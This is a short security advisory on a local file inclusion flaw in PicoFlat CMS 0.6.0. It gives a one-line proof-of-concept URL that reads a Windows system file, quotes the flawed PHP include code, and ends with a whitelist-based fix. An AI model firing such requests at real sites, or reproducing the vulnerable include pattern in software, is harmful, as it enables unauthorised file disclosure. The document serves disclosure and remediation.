PicoFlat CMS version 0.6.0 suffers from a local file inclusion vulnerability. This is the same vulnerability that versions 0.5.9 and below suffered from; the author has not addressed the issue.
PicoFlatCMS 0.6.0 LFI
http://www.sourceforge.net/projects/picoflatcms
Same old thing:
http://site/index.php?pagina=C:\boot.ini
Fixme:
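// Only values containing "://" or "?" are rejected; any other value,
// including a local filesystem path, is passed straight to include.
if (eregi("\:\/\/", $pagina) || eregi("\?", $pagina)) {
    $pagina = "";
    include "notfound.php";
} else {
    include $pagina;
}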
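
One way to close this, as an added example that is not PicoFlat CMS code: instead of blacklisting "://" and "?", accept only a bare page name and confirm the resolved file sits inside a fixed pages directory. PAGES_DIR, resolve_page() and the one-.php-file-per-page layout are assumptions made for the illustration.

```php
<?php
// Added example, not PicoFlat CMS code. PAGES_DIR and resolve_page() are
// hypothetical names; the layout (one .php file per page under pages/)
// is an assumption.
define('PAGES_DIR', __DIR__ . '/pages');

/**
 * Map a user-supplied page name to a file inside PAGES_DIR.
 * Returns the absolute path, or null if the name is not acceptable.
 */
function resolve_page($name)
{
    // Accept a bare page name only: no slashes, backslashes, dots, colons
    // or NUL bytes, so "C:\boot.ini" and "../x" are rejected at this step.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null; // pages directory or requested file does not exist
    }

    // Defence in depth: the canonical path (symlinks resolved) must still
    // sit directly under the pages directory.
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

$pagina = isset($_GET['pagina']) ? $_GET['pagina'] : '';
$file = resolve_page($pagina);
if ($file === null) {
    include 'notfound.php';
} else {
    include $file;
}
```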